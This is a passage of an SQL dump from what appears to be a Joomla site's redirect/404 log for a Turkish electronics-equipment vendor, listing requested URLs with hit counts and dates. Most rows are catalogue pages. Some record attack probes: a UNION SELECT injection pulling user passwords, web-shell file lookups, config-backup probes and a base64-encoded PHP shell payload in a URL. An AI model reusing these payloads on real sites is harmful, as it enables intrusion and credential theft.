00:00:00',301),(17811,'http://3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-ultra-hız/by,`p`.product_sku/dirdesc/results,1-10',NULL,'','',1,0,'2018-01-13 05:55:49','0000-00-00 00:00:00',301),(17812,'http://3s-technologies.com.tr/en/products/dalga-lehim/by,pc.ordering,product_name/dirdesc/results,1-5',NULL,'','',1,0,'2018-01-13 07:24:44','0000-00-00 00:00:00',301),(17813,'http://www.3s-technologies.com.tr/en/products/manufacturer/smd-orta-hızlı/by,product_name/results,1-20',NULL,'','',1,0,'2018-01-13 07:27:44','0000-00-00 00:00:00',301),(17814,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/mirae/smd-orta-hızlı/by,category_name/dirdesc/results,1-5?language=en-gb',NULL,'','',1,0,'2018-01-13 08:36:40','0000-00-00 00:00:00',301),(17815,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/panasonic/smd-orta-hızlı/by,mf_name/results,1-20?language=en-gb',NULL,'','',1,0,'2018-01-13 09:16:46','0000-00-00 00:00:00',301),(17816,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/tel-lehim/by,mf_name/results,1-20',NULL,'','',1,0,'2018-01-13 10:23:54','0000-00-00 00:00:00',301),(17817,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/tolo/screen-printer/by,product_name/dirdesc/results,1-20',NULL,'','',1,0,'2018-01-13 10:31:33','0000-00-00 00:00:00',301),(17818,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/panasonic/smd-ultra-hız/by,product_sku/results,1-5',NULL,'','',1,0,'2018-01-13 10:39:13','0000-00-00 00:00:00',301),(17819,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/ddm-novastar/smd-fırın/by,pc.ordering,product_name/dirdesc/results,1-10?language=en-gb',NULL,'','',1,0,'2018-01-13 13:16:29','0000-00-00 00:00:00',301),(17820,'http://3s-technologies.com.tr/tr/ã¼rã¼nler/manufacturers/tolo',NULL,'','',3,0,'2018-01-13 13:44:34','0000-00-00 00:00:00',301),(17821,'http://3s-technologies.com.tr/tr/ã¼rã¼nler/manufacturers/mirae',NULL,'','',4,0,'2018-01-14 02:56:49','0000-00-00 00:00:00',301),(17822,'http://3s-technologies.com.tr/tr/ã¼rã¼nler/thru-hole',NULL,'','',4,0,'2018-01-14 06:09:02','0000-00-00 00:00:00',301),(17823,'http://3s-technologies.com.tr/tr/ã¼rã¼nler/smd-ultra-hä±z',NULL,'','',6,0,'2018-01-14 11:43:25','0000-00-00 00:00:00',301),(17824,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/mirae/smd-ultra-hız/by,`p`.product_sku/results,1-20',NULL,'','',3,0,'2018-01-14 13:01:16','0000-00-00 00:00:00',301),(17825,'http://www.3s-technologies.com.tr/tr/wp-content/plugins/sfwd-lms/templates/learndash_template_script.js',NULL,'','',1,0,'2018-01-14 15:36:27','0000-00-00 00:00:00',301),(17826,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/mirae/smd-ultra-hız/by,pc.ordering,product_name/results,1-5',NULL,'','',2,0,'2018-01-14 15:38:58','0000-00-00 00:00:00',301),(17827,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/mirae/smd-ultra-hız/by,pc.ordering,product_name/results,1-20',NULL,'','',2,0,'2018-01-14 15:49:08','0000-00-00 00:00:00',301),(17828,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/mirae/smd-ultra-hız/by,pc.ordering,product_name/results,1-50',NULL,'','',6,0,'2018-01-14 16:20:18','0000-00-00 00:00:00',301),(17829,'http://www.3s-technologies.com.tr/tr/wp-config.php~',NULL,'','',1,0,'2018-01-14 17:03:29','0000-00-00 00:00:00',301),(17830,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/mirae/smd-ultra-hız/by,pc.ordering,product_name/results,1-10',NULL,'','',4,0,'2018-01-14 17:14:46','0000-00-00 00:00:00',301),(17831,'http://3s-technologies.com.tr/tr/ã¼rã¼nler/konveyorler',NULL,'','',5,0,'2018-01-14 18:04:00','0000-00-00 00:00:00',301),(17832,'http://3s-technologies.com.tr/tr/ã¼rã¼nler/screen-printer',NULL,'','',3,0,'2018-01-15 07:14:01','0000-00-00 00:00:00',301),(17833,'https://www.3s-technologies.com.tr/tr/megatek-elektronik.com.tr/joomla/index.php',NULL,'https://www.3s-technologies.com.tr/tr/megatek-elektronik.com.tr/joomla/index.php','',5,0,'2018-01-15 08:21:32','0000-00-00 00:00:00',301),(17834,'https://3s-technologies.com.tr/tr/ã¼rã¼nler/smd-fä±rä±n',NULL,'','',14,0,'2018-01-15 10:04:30','0000-00-00 00:00:00',301),(17835,'http://www.3s-technologies.com.tr/tr/?option=com_content&view=section&id=6&itemid=1',NULL,'','',6,0,'2018-01-15 10:33:29','0000-00-00 00:00:00',301),(17836,'https://3s-technologies.com.tr/nova-elektronik.com.tr/joomla/index.php?lang=tr',NULL,'','',3,0,'2018-01-15 11:42:30','0000-00-00 00:00:00',301),(17837,'http://3s-technologies.com.tr/en/components/com_contact/views/category/com_contact_info.php?c=phpinfo',NULL,'3s-technologies.com.tr','',1,0,'2018-01-15 12:21:58','0000-00-00 00:00:00',301),(17838,'http://www.3s-technologies.com.tr/en/products/lehimleme-malzemeleri/results,1-100',NULL,'','',2,0,'2018-01-15 18:36:51','0000-00-00 00:00:00',301),(17839,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/mirae/smd-ultra-hız/by,category_name/results,1-5',NULL,'','',10,0,'2018-01-15 23:43:59','0000-00-00 00:00:00',301),(17840,'http://www.3s-technologies.com.tr/en/products/lehimleme-malzemeleri/results,1-20',NULL,'','',1,0,'2018-01-16 01:23:06','0000-00-00 00:00:00',301),(17841,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/mirae/smd-ultra-hız/by,category_name/dirdesc',NULL,'','',1,0,'2018-01-16 02:20:30','0000-00-00 00:00:00',301),(17842,'http://www.3s-technologies.com.tr/en/products/lehimleme-malzemeleri/dirdesc/results,1-40',NULL,'','',11,0,'2018-01-16 02:36:09','0000-00-00 00:00:00',301),(17843,'http://www.3s-technologies.com.tr/en/wp-content/themes/headway-163/style.css',NULL,'http://www.3s-technologies.com.tr/wp-content/themes/headway-163/style.css','',4,0,'2018-01-16 03:09:45','0000-00-00 00:00:00',301),(17844,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/mirae/smd-ultra-hız/by,product_name/dirdesc/results,1-5',NULL,'','',5,0,'2018-01-16 03:12:40','0000-00-00 00:00:00',301),(17845,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/mirae/smd-ultra-hız/by,category_name/results,1-5',NULL,'','',7,0,'2018-01-16 03:49:11','0000-00-00 00:00:00',301),(17846,'http://www.3s-technologies.com.tr/en/products/lehimleme-malzemeleri/by,product_name/dirdesc',NULL,'','',3,0,'2018-01-16 03:54:25','0000-00-00 00:00:00',301),(17847,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/mirae/smd-ultra-hız/by,category_name/results,1-10',NULL,'','',6,0,'2018-01-16 04:36:08','0000-00-00 00:00:00',301),(17848,'http://www.3s-technologies.com.tr/en/products/lehimleme-malzemeleri/by,mf_name/results,1-10',NULL,'','',8,0,'2018-01-16 05:07:27','0000-00-00 00:00:00',301),(17849,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/mirae/smd-ultra-hız/by,category_name/results,1-20',NULL,'','',3,0,'2018-01-16 05:59:37','0000-00-00 00:00:00',301),(17850,'http://www.3s-technologies.com.tr/en/products/lehimleme-malzemeleri/by,mf_name/results,1-40',NULL,'','',1,0,'2018-01-16 06:30:56','0000-00-00 00:00:00',301),(17851,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/mirae/smd-ultra-hız/by,category_name/results,1-50',NULL,'','',9,0,'2018-01-16 07:07:26','0000-00-00 00:00:00',301),(17852,'http://www.3s-technologies.com.tr/en/products/lehimleme-malzemeleri/by,category_name/dirdesc',NULL,'','',15,0,'2018-01-16 07:43:57','0000-00-00 00:00:00',301),(17853,'http://3s-technologies.com.tr/images/side.php',NULL,'3s-technologies.com.tr','',1,0,'2018-01-16 08:08:40','0000-00-00 00:00:00',301),(17854,'http://3s-technologies.com.tr/side.php',NULL,'3s-technologies.com.tr','',1,0,'2018-01-16 08:09:24','0000-00-00 00:00:00',301),(17855,'http://3s-technologies.com.tr/plugins/user/pre.php',NULL,'3s-technologies.com.tr','',1,0,'2018-01-16 08:15:18','0000-00-00 00:00:00',301),(17856,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/mirae/smd-ultra-hız/by,product_name/dirdesc/results,1-5',NULL,'','',3,0,'2018-01-16 08:25:42','0000-00-00 00:00:00',301),(17857,'http://www.3s-technologies.com.tr/en/products/lehimleme-malzemeleri/by,mf_name/results,1-100',NULL,'','',3,0,'2018-01-16 08:41:21','0000-00-00 00:00:00',301),(17858,'http://3s-technologies.com.tr/en/includes.php',NULL,'3s-technologies.com.tr','',20,0,'2018-01-16 10:10:59','0000-00-00 00:00:00',301),(17859,'http://3s-technologies.com.tr/libraries/phputf8/phputf8.php',NULL,'3s-technologies.com.tr','',1,0,'2018-01-16 11:59:55','0000-00-00 00:00:00',301),(17860,'http://3s-technologies.com.tr/components/com_banners/setting.php',NULL,'3s-technologies.com.tr','',1,0,'2018-01-16 11:59:56','0000-00-00 00:00:00',301),(17861,'http://3s-technologies.com.tr/modules/mod_archive/tmpl/index.php',NULL,'3s-technologies.com.tr','',1,0,'2018-01-16 12:01:01','0000-00-00 00:00:00',301),(17862,'http://3s-technologies.com.tr/components/com_wrapper/wraper.php',NULL,'3s-technologies.com.tr','',1,0,'2018-01-16 12:01:14','0000-00-00 00:00:00',301),(17863,'http://www.3s-technologies.com.tr/en/products/lehimleme-malzemeleri/by,ordering/results,1-100',NULL,'','',4,0,'2018-01-16 12:02:11','0000-00-00 00:00:00',301),(17864,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/mirae/smd-ultra-hız/by,category_name/dirdesc/results,1-5',NULL,'','',3,0,'2018-01-16 12:23:21','0000-00-00 00:00:00',301),(17865,'http://www.3s-technologies.com.tr/en/wp-login.php',NULL,'','',32,0,'2018-01-16 20:57:02','0000-00-00 00:00:00',301),(17866,'http://www.3s-technologies.com.tr/en/products/lehimleme-malzemeleri/by,product_sku/results,1-10',NULL,'','',3,0,'2018-01-17 03:43:09','0000-00-00 00:00:00',301),(17867,'http://3s-technologies.com.tr/tr/components/com_b2jcontact/uploads/izo.php',NULL,'','',1,0,'2018-01-17 08:03:19','0000-00-00 00:00:00',301),(17868,'https://3s-technologies.com.tr/tr/ã¼rã¼nler/dalga-lehim',NULL,'','',12,0,'2018-01-17 09:50:45','0000-00-00 00:00:00',301),(17869,'http://3s-technologies.com.tr/tr/components/com_weblinks/config.php',NULL,'http://3s-technologies.com.tr/tr/components/com_weblinks/config.php','',3,0,'2018-01-17 12:48:35','0000-00-00 00:00:00',301),(17870,'http://3s-technologies.com.tr/tr/administrator/components/com_weblinks/config.php',NULL,'http://www.google.com/','',1,0,'2018-01-17 15:46:26','0000-00-00 00:00:00',301),(17871,'http://www.3s-technologies.com.tr/tr/tmp/xax.php',NULL,'','',1,0,'2018-01-17 18:17:38','0000-00-00 00:00:00',301),(17872,'http://www.3s-technologies.com.tr/tr/tmp/vip.php',NULL,'','',1,0,'2018-01-17 18:17:40','0000-00-00 00:00:00',301),(17873,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/mirae/smd-ultra-hız/by,product_name/dirdesc/results,1-50',NULL,'','',3,0,'2018-01-18 03:10:47','0000-00-00 00:00:00',301),(17874,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/mirae/smd-ultra-hız/by,product_name/dirdesc/results,1-20',NULL,'','',4,0,'2018-01-18 04:24:45','0000-00-00 00:00:00',301),(17875,'https://3s-technologies.com.tr/tr/hakkä±mä±zda',NULL,'','',16,0,'2018-01-18 04:50:16','0000-00-00 00:00:00',301),(17876,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/by,product_sku',NULL,'','',4,0,'2018-01-18 07:04:38','0000-00-00 00:00:00',301),(17877,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/mirae/smd-ultra-hız/by,product_name/dirdesc/results,1-20',NULL,'','',4,0,'2018-01-18 07:12:25','0000-00-00 00:00:00',301),(17878,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/mirae/smd-ultra-hız/by,product_name/dirdesc/results,1-50',NULL,'','',8,0,'2018-01-18 08:21:27','0000-00-00 00:00:00',301),(17879,'http://www.3s-technologies.com.tr/tr/wp-content/plugins/php-event-calendar/js/file-uploader/jquery.fileupload.js',NULL,'','',2,0,'2018-01-18 08:25:05','0000-00-00 00:00:00',301),(17880,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/mirae/smd-ultra-hız/by,product_name/dirdesc/results,1-10',NULL,'','',3,0,'2018-01-18 10:09:56','0000-00-00 00:00:00',301),(17881,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/by,`p`.product_sku',NULL,'','',4,0,'2018-01-18 12:36:11','0000-00-00 00:00:00',301),(17882,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/by,pc.ordering,product_name',NULL,'','',4,0,'2018-01-18 14:30:51','0000-00-00 00:00:00',301),(17883,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/mirae/smd-ultra-hız/by,category_name/dirdesc/results,1-50',NULL,'','',1,0,'2018-01-18 15:10:51','0000-00-00 00:00:00',301),(17884,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/mirae/smd-ultra-hız/by,category_name/dirdesc/results,1-20',NULL,'','',1,0,'2018-01-18 16:12:11','0000-00-00 00:00:00',301),(17885,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/by,mf_name/dirdesc',NULL,'','',4,0,'2018-01-18 16:14:51','0000-00-00 00:00:00',301),(17886,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/by,mf_name/results,1-20',NULL,'','',4,0,'2018-01-18 17:10:51','0000-00-00 00:00:00',301),(17887,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/mirae/smd-ultra-hız/by,category_name/dirdesc/results,1-10',NULL,'','',3,0,'2018-01-18 17:37:31','0000-00-00 00:00:00',301),(17888,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/by,mf_name/results,1-10',NULL,'','',4,0,'2018-01-18 18:12:11','0000-00-00 00:00:00',301),(17889,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/by,mf_name/results,1-40',NULL,'','',3,0,'2018-01-18 20:06:50','0000-00-00 00:00:00',301),(17890,'https://3s-technologies.com.tr/templates/rhuk_milkyway/index.php',NULL,'3s-technologies.com.tr','',1,0,'2018-01-18 21:04:23','0000-00-00 00:00:00',301),(17891,'https://3s-technologies.com.tr/images/jlogo.php',NULL,'3s-technologies.com.tr','',1,0,'2018-01-18 21:17:14','0000-00-00 00:00:00',301),(17892,'https://3s-technologies.com.tr/modules/thumbsj3tmp/img.resize.php',NULL,'3s-technologies.com.tr','',1,0,'2018-01-18 21:19:49','0000-00-00 00:00:00',301),(17893,'https://3s-technologies.com.tr/administrator/templates/khepri/index.php',NULL,'3s-technologies.com.tr','',1,0,'2018-01-18 21:21:05','0000-00-00 00:00:00',301),(17894,'https://3s-technologies.com.tr/templates/ja_purity/index.php',NULL,'3s-technologies.com.tr','',1,0,'2018-01-18 21:21:32','0000-00-00 00:00:00',301),(17895,'https://3s-technologies.com.tr/media/thumbsj3tmp/img.resize.php',NULL,'3s-technologies.com.tr','',2,0,'2018-01-18 21:22:41','0000-00-00 00:00:00',301),(17896,'https://3s-technologies.com.tr/templates/jtemplate/jtemplate.php',NULL,'3s-technologies.com.tr','',1,0,'2018-01-18 21:23:15','0000-00-00 00:00:00',301),(17897,'https://3s-technologies.com.tr/templates/j7templates/j7templates.php',NULL,'3s-technologies.com.tr','',1,0,'2018-01-18 21:23:54','0000-00-00 00:00:00',301),(17898,'https://3s-technologies.com.tr/templates/j11templates/j11templates.php',NULL,'3s-technologies.com.tr','',1,0,'2018-01-18 21:27:30','0000-00-00 00:00:00',301),(17899,'https://3s-technologies.com.tr/joomla/media/thumbsj3tmp/img.resize.php',NULL,'3s-technologies.com.tr','',1,0,'2018-01-18 21:28:46','0000-00-00 00:00:00',301),(17900,'https://3s-technologies.com.tr/templates/beez/index.php',NULL,'3s-technologies.com.tr','',1,0,'2018-01-18 21:32:50','0000-00-00 00:00:00',301),(17901,'https://3s-technologies.com.tr/logs/thumbsj3tmp/img.resize.php',NULL,'3s-technologies.com.tr','',2,0,'2018-01-18 21:33:36','0000-00-00 00:00:00',301),(17902,'https://3s-technologies.com.tr/modules/mod_j2module/mod_j2module.php',NULL,'3s-technologies.com.tr','',1,0,'2018-01-18 21:36:46','0000-00-00 00:00:00',301),(17903,'https://3s-technologies.com.tr/templates/j2template/j2template.php',NULL,'3s-technologies.com.tr','',1,0,'2018-01-18 21:40:56','0000-00-00 00:00:00',301),(17904,'https://3s-technologies.com.tr/templates/j9templates/j9templates.php',NULL,'3s-technologies.com.tr','',1,0,'2018-01-18 21:41:35','0000-00-00 00:00:00',301),(17905,'https://3s-technologies.com.tr/templates/thumbsj3tmp/img.resize.php',NULL,'3s-technologies.com.tr','',1,0,'2018-01-18 21:44:17','0000-00-00 00:00:00',301),(17906,'https://3s-technologies.com.tr/cache/thumbsj3tmp/img.resize.php',NULL,'3s-technologies.com.tr','',1,0,'2018-01-18 21:45:15','0000-00-00 00:00:00',301),(17907,'https://3s-technologies.com.tr/modules/mod_jmodule/mod_j1module.php',NULL,'3s-technologies.com.tr','',1,0,'2018-01-18 21:45:32','0000-00-00 00:00:00',301),(17908,'https://3s-technologies.com.tr/templates/jtemplates/jtemplates.php',NULL,'3s-technologies.com.tr','',1,0,'2018-01-18 21:45:49','0000-00-00 00:00:00',301),(17909,'https://3s-technologies.com.tr/templates/jtemplate/j1template.php',NULL,'3s-technologies.com.tr','',1,0,'2018-01-18 21:46:25','0000-00-00 00:00:00',301),(17910,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/by,product_name/dirdesc',NULL,'','',4,0,'2018-01-18 21:48:10','0000-00-00 00:00:00',301),(17911,'https://3s-technologies.com.tr/plugins/jplugin/jplugin/j2plugin.php',NULL,'3s-technologies.com.tr','',1,0,'2018-01-18 21:58:27','0000-00-00 00:00:00',301),(17912,'https://3s-technologies.com.tr/components/thumbsj3tmp/img.resize.php',NULL,'3s-technologies.com.tr','',1,0,'2018-01-18 22:01:50','0000-00-00 00:00:00',301),(17913,'https://3s-technologies.com.tr/language/thumbsj3tmp/img.resize.php',NULL,'3s-technologies.com.tr','',1,0,'2018-01-18 22:11:51','0000-00-00 00:00:00',301),(17914,'https://3s-technologies.com.tr/tmp/thumbsj3tmp/img.resize.php',NULL,'3s-technologies.com.tr','',1,0,'2018-01-18 22:12:43','0000-00-00 00:00:00',301),(17915,'https://3s-technologies.com.tr/modules/mod_jmodule/mod_jmodule.php',NULL,'3s-technologies.com.tr','',1,0,'2018-01-18 22:13:50','0000-00-00 00:00:00',301),(17916,'http://www.3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=116:sogutucu-sprey-frz&catid=40:temizleme&itemid=127&lang=tr',NULL,'','',2,0,'2018-01-18 23:42:50','0000-00-00 00:00:00',301),(17917,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/by,mf_name/results,1-100',NULL,'','',1,0,'2018-01-19 00:06:50','0000-00-00 00:00:00',301),(17918,'http://www.3s-technologies.com.tr/tr/urunler/2-el-makineler/results,1-10',NULL,'','',4,0,'2018-01-19 00:28:11','0000-00-00 00:00:00',301),(17919,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/by,ordering/results,1-10',NULL,'','',3,0,'2018-01-19 02:33:31','0000-00-00 00:00:00',301),(17920,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/by,product_sku/results,1-10',NULL,'','',3,0,'2018-01-19 03:32:09','0000-00-00 00:00:00',301),(17921,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/by,product_sku/results,1-20',NULL,'','',5,0,'2018-01-19 04:36:09','0000-00-00 00:00:00',301),(17922,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/by,product_sku/results,1-40',NULL,'','',1,0,'2018-01-19 05:29:29','0000-00-00 00:00:00',301),(17923,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/temizleme-makineleri',NULL,'','',16,0,'2018-01-19 05:44:03','0000-00-00 00:00:00',301),(17924,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/by,product_name/results,1-20',NULL,'','',1,0,'2018-01-19 06:38:48','0000-00-00 00:00:00',301),(17925,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/by,product_name/results,1-40',NULL,'','',1,0,'2018-01-19 06:52:45','0000-00-00 00:00:00',301),(17926,'https://3s-technologies.com.tr/tr/ã¼rã¼nler/lehimleme-malzemeleri',NULL,'','',7,0,'2018-01-19 08:42:21','0000-00-00 00:00:00',301),(17927,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/by,product_name/results,1-10',NULL,'','',2,0,'2018-01-19 11:00:08','0000-00-00 00:00:00',301),(17928,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/by,product_sku/results,1-100',NULL,'','',1,0,'2018-01-19 12:20:07','0000-00-00 00:00:00',301),(17929,'http://3s-technologies.com.tr/tr//components/com_jnews/includes/openflashchart/php-ofc-library/ocf_x_legend.php',NULL,'http://www.google.com/','',1,0,'2018-01-20 03:06:34','0000-00-00 00:00:00',301),(17930,'http://3s-technologies.com.tr/tr/components/com_jnews/includes/openflashchart/php-ofc-library/ocf_x_legend.php',NULL,'http://www.google.com/','',3,0,'2018-01-20 06:09:08','0000-00-00 00:00:00',301),(17931,'http://www.3s-technologies.com.tr/en/theme/assets/global/plugins/jquery-file-upload/server/php',NULL,'http://www.3s-technologies.com.tr/theme/assets/global/plugins/jquery-file-upload/server/php/','',4,0,'2018-01-20 08:22:40','0000-00-00 00:00:00',301),(17932,'http://3s-technologies.com.tr/en/?option=com_tag&controller=tag&task=add&article_id=-260479/**//*!union*//**//*!select*//**/concat(username,0x3a,password,0x3a,usertype)/**//*!from*//**/jos_users/**/&tmpl=component',NULL,'','',1,0,'2018-01-20 11:05:52','0000-00-00 00:00:00',301),(17933,'http://www.3s-technologies.com.tr/tr/index.php/login-form',NULL,'','',8,0,'2018-01-20 22:07:49','0000-00-00 00:00:00',301),(17934,'http://www.3s-technologies.com.tr/tr/index.php/login',NULL,'','',20,0,'2018-01-20 22:07:50','0000-00-00 00:00:00',301),(17935,'http://www.3s-technologies.com.tr/tr/index.php/register',NULL,'','',8,0,'2018-01-20 22:07:50','0000-00-00 00:00:00',301),(17936,'http://www.3s-technologies.com.tr/tr/index.php/log-out?view=registration',NULL,'','',4,0,'2018-01-20 22:07:55','0000-00-00 00:00:00',301),(17937,'http://www.3s-technologies.com.tr/tr/create-an-account/',NULL,'','',4,0,'2018-01-20 22:07:58','0000-00-00 00:00:00',301),(17938,'http://www.3s-technologies.com.tr/tr/index.php/user-profile?view=registration',NULL,'','',4,0,'2018-01-20 22:07:58','0000-00-00 00:00:00',301),(17939,'http://www.3s-technologies.com.tr/tr/index.php/using-joomla/extensions/components/users-component/registration-form',NULL,'','',4,0,'2018-01-20 22:07:59','0000-00-00 00:00:00',301),(17940,'http://www.3s-technologies.com.tr/tr/index.php/component/users/?view=registration',NULL,'','',4,0,'2018-01-20 22:07:59','0000-00-00 00:00:00',301),(17941,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/rh6-detail?tmpl=component&print=1',NULL,'','',3,0,'2018-01-21 10:47:56','0000-00-00 00:00:00',301),(17942,'https://3s-technologies.com.tr/tr/ã¼rã¼nler/manufacturers/mirae',NULL,'','',1,0,'2018-01-21 12:11:09','0000-00-00 00:00:00',301),(17943,'http://www.3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-ultra-hız/results,1-5',NULL,'','',4,0,'2018-01-21 14:10:25','0000-00-00 00:00:00',301),(17944,'http://www.3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-ultra-hız/results,1-50',NULL,'','',4,0,'2018-01-21 17:10:24','0000-00-00 00:00:00',301),(17945,'http://www.3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-ultra-hız/results,1-10',NULL,'','',4,0,'2018-01-21 17:54:02','0000-00-00 00:00:00',301),(17946,'http://3s-technologies.com.tr/en/login/ajax-login',NULL,'','',1,0,'2018-01-21 20:28:15','0000-00-00 00:00:00',301),(17947,'http://www.3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-ultra-hız/by,category_name/results,1-5',NULL,'','',4,0,'2018-01-21 22:19:18','0000-00-00 00:00:00',301),(17948,'http://www.3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-ultra-hız/results,1-20',NULL,'','',4,0,'2018-01-22 00:58:26','0000-00-00 00:00:00',301),(17949,'http://3s-technologies.com.tr/tr//components/com_weblinks/metadata.php',NULL,'http://www.google.com/','',1,0,'2018-01-22 02:56:18','0000-00-00 00:00:00',301),(17950,'http://www.3s-technologies.com.tr/tr/urunler/smd-ultra-hä±z/cm-602-l-detail',NULL,'','',6,0,'2018-01-22 04:52:21','0000-00-00 00:00:00',301),(17951,'http://3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-ultra-hız/by,mf_name/results,1-10',NULL,'','',15,0,'2018-01-22 05:08:32','0000-00-00 00:00:00',301),(17952,'http://3s-technologies.com.tr/tr/components/com_weblinks/metadata.php',NULL,'http://www.google.com/','',3,0,'2018-01-22 05:47:02','0000-00-00 00:00:00',301),(17953,'http://www.3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-ultra-hız/by,ordering/results,1-10',NULL,'','',4,0,'2018-01-22 07:00:56','0000-00-00 00:00:00',301),(17954,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/ddm-novastar/screen-printer',NULL,'','',4,0,'2018-01-22 11:14:56','0000-00-00 00:00:00',301),(17955,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/panasonic/screen-printer',NULL,'','',2,0,'2018-01-22 11:14:58','0000-00-00 00:00:00',301),(17956,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/tolo/screen-printer',NULL,'','',5,0,'2018-01-22 11:15:43','0000-00-00 00:00:00',301),(17957,'https://3s-technologies.com.tr/index.php',NULL,'3s-technologies.com.tr','',87,0,'2018-01-22 12:42:44','0000-00-00 00:00:00',301),(17958,'http://www.3s-technologies.com.tr/en/upload/server/php',NULL,'http://www.3s-technologies.com.tr/upload/server/php/','',2,0,'2018-01-22 14:22:00','0000-00-00 00:00:00',301),(17959,'http://www.3s-technologies.com.tr/en/jquery-file-upload/server/php',NULL,'http://www.3s-technologies.com.tr/jquery-file-upload/server/php/','',1,0,'2018-01-22 15:12:40','0000-00-00 00:00:00',301),(17960,'http://www.3s-technologies.com.tr/tr/urunler/smd-fã„â±rã„â±n/gf-12-hc-ht-detail',NULL,'','',5,0,'2018-01-23 08:37:45','0000-00-00 00:00:00',301),(17961,'https://3s-technologies.com.tr/tmp/plain;base64,pd9wahagqgfzc2vydchaymfzzty0x2rly29kzshac3ryx3jvddezkcrfue9tvfsizgf0ysjdkskpo2rpzts7pz4=;.php',NULL,'3s-technologies.com.tr','',1,0,'2018-01-23 11:10:05','0000-00-00 00:00:00',301),(17962,'http://www.3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-ultra-hız/by,product_name/results,1-5',NULL,'','',1,0,'2018-01-23 11:26:29','0000-00-00 00:00:00',301),(17963,'http://www.3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-ultra-hız/by,product_name/results,1-10',NULL,'','',5,0,'2018-01-23 11:41:57','0000-00-00 00:00:00',301),(17964,'http://3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-ultra-hız/by,product_name/results,1-10',NULL,'','',4,0,'2018-01-23 11:52:08','0000-00-00 00:00:00',301),(17965,'http://www.3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-ultra-hız/by,product_name/results,1-20',NULL,'','',1,0,'2018-01-23 12:22:28','0000-00-00 00:00:00',301),(17966,'http://3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-ultra-hız/by,category_name/results,1-10',NULL,'','',4,0,'2018-01-23 12:58:04','0000-00-00 